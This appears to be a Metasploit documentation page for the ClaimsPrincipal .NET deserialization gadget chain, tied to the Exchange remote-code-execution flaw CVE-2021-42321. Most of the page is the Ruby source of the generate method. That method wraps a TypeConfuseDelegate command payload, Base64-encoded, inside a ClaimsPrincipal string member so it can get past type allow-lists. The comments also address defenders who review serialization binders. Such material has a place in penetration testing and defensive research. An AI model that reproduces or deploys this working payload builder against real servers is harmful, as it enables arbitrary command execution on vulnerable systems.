Class: Msf::Util::DotNetDeserialization::GadgetChains::ClaimsPrincipal

Inherits:
Types::SerializedStream show all
Defined in:
lib/msf/util/dot_net_deserialization/gadget_chains/claims_principal.rb

Class Method Summary collapse

Methods inherited from Types::SerializedStream

from_values, #get_object, #set_object

Class Method Details

.generate(cmd) ⇒ Object

ClaimsPrincipal

Credits:
  Finders: jang
  Contributors: jang
References:
  https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852


# File 'lib/msf/util/dot_net_deserialization/gadget_chains/claims_principal.rb', line 15

# Builds the ClaimsPrincipal gadget chain as a two-layer serialized stream.
#
# The outer stream holds one System.Security.Claims.ClaimsPrincipal object
# whose only member, m_serializedClaimsIdentities, is declared as a String.
# That string is the Base64 text of a complete TypeConfuseDelegate stream, so
# the types used by the inner chain never appear as records in the outer one.
#
# NOTE(review): the inner stream only matters if the consuming side decodes
# and deserializes that member again; this method does not show that step, so
# confirm against the write-up referenced for this chain. For anyone reviewing
# a type allow-list or serialization binder, the point to check is whether
# admitting ClaimsPrincipal also admits whatever its string member carries.
#
# @param cmd [Object] passed unchanged to GadgetChains::TypeConfuseDelegate.generate
# @return [Object] whatever from_values returns for the three records
def self.generate(cmd)
  nested_stream = GadgetChains::TypeConfuseDelegate.generate(cmd)

  # Record 1: stream header, with the root object id pointing at the principal.
  header = Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1)

  principal_info = Types::General::ClassInfo.new(
    obj_id: 1,
    name: 'System.Security.Claims.ClaimsPrincipal',
    member_names: ['m_serializedClaimsIdentities']
  )
  principal_member_types = Types::General::MemberTypeInfo.new(binary_type_enums: [:String])

  # The nested stream is carried as text: binary form first, then Base64.
  encoded_identities = Types::RecordValues::BinaryObjectString.new(
    obj_id: 5,
    string: Rex::Text.encode_base64(nested_stream.to_binary_s)
  )

  # Record 2: the ClaimsPrincipal object with its single string member.
  principal = Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
    class_info: principal_info,
    member_type_info: principal_member_types,
    member_values: [Types::Record.from_value(encoded_identities)]
  )

  # Record 3 is the end-of-message marker.
  from_values([header, principal, Types::RecordValues::MessageEnd.new])
end